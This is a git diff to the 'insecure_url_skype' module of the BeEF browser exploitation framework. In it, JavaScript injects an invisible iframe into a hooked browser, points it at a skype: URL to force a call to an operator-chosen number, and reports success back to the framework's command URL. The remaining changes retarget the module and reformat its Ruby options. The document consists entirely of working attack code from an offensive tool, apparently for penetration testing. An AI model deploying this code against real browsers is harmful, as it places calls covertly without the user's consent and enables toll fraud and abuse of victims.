diff --git a/modules/host/insecure_url_skype/command.js b/modules/host/insecure_url_skype/command.js index 543439af9..00f6ac8f4 100644 --- a/modules/host/insecure_url_skype/command.js +++ b/modules/host/insecure_url_skype/command.js @@ -15,6 +15,6 @@ // beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); - sploit.src = 'skype://<%= @tel_num %>?call'; + sploit.src = 'skype:<%= @tel_num %>?call'; beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!"); }); diff --git a/modules/host/insecure_url_skype/config.yaml b/modules/host/insecure_url_skype/config.yaml index e88a63b82..b2d153bd6 100644 --- a/modules/host/insecure_url_skype/config.yaml +++ b/modules/host/insecure_url_skype/config.yaml @@ -22,5 +22,4 @@ beef: description: "This module will force the browser to attempt a skype call. It will exploit the insecure handling of URL schemes

The protocol handler used will be: skype." authors: ["xntrik", "Nitesh Dhanjani"] target: - working: ['S'] - user_notify: ['C', 'FF', 'O'] + user_notify: ['S', 'C', 'FF', 'O'] diff --git a/modules/host/insecure_url_skype/module.rb b/modules/host/insecure_url_skype/module.rb index 5d1ad67b4..b08fd15cb 100644 --- a/modules/host/insecure_url_skype/module.rb +++ b/modules/host/insecure_url_skype/module.rb @@ -16,7 +16,13 @@ class Insecure_url_skype < BeEF::Core::Command def self.options - { 'name' => 'tel_num', 'description' => 'The telephone number to dial', 'ui_label'=>'Number', 'value' =>'5551234', 'width' => '200px' } + return [{ + 'name' => 'tel_num', + 'description' => 'The telephone number to dial', + 'ui_label'=>'Number', + 'value' =>'5551234', + 'width' => '200px' + }] end def post_execute